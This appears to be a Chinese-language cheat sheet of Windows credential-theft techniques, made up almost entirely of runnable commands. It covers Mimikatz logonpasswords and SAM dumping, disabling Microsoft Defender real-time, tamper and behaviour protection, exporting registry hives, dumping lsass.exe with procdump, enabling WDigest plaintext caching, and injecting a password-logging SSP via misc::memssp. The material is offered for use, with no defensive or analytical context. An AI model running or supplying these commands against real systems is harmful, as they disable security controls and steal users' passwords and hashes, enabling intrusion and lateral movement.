1.1Mimikatz

原版工具：
https://github.com/gentilkiwi/mimikatz

1.使用方法

privilege::debug #提升权限，返回Privilege '20' OK。说明权限提升成功

sekurlsa::logonpasswords #可以读取到NTLM哈希值

非交互方式获取

mimikatz.exe "log logon.txt" "privilege::debug" "sekurlsa::logonpasswords" "exit"

2.windows10及以上版本需要关闭defender

（1） 临时关闭实时保护（重启后可能恢复）

# 以管理员身份运行PowerShell

Set-MpPreference -DisableRealtimeMonitoring $true

（2）永久关闭（需先禁用篡改防护）

powershell

# 禁用篡改防护（必要步骤）

Set-MpPreference -DisableTamperProtection $true

# 关闭实时保护

Set-MpPreference -DisableRealtimeMonitoring $true

# 禁用云防护和自动样本提交（可选）

Set-MpPreference -DisableBehaviorMonitoring $true

Set-MpPreference -SubmitSamplesConsent 2

1.2注册表导出

1.通过system权限导出注册表文件

reg save HKLM\SYSTEM system.hiv

reg save HKLM\SAM sam.hiv

reg save hklm\security security.hiv

2.在本地使用mimikatz执行：

mimikatz.exe "lsadump::sam /system:system.hiv /sam:sam.hiv" exit

1.3 Procdump+Mimikatz

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

使用方法：

先dump出lsass.exe：

32位：

procdump.exe -accepteula -ma lsass.exe lsass.dmp

64位：

procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp

mimikatz读取：

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords full

procdump.exe -accepteula -ma lsass.exe lsass.dmp

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords full

获取明文密码方法

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

1.4 mimikatz插ssp记录密码

o system权限

o 锁屏并重新登入

privilege::debug

misc::memssp

修改完之后使用以下命令锁屏：rundll32.exe user32.dll,LockWorkStation

然后在以下目录下发现明文密码：

C:\Windows\System32\mimilsa.log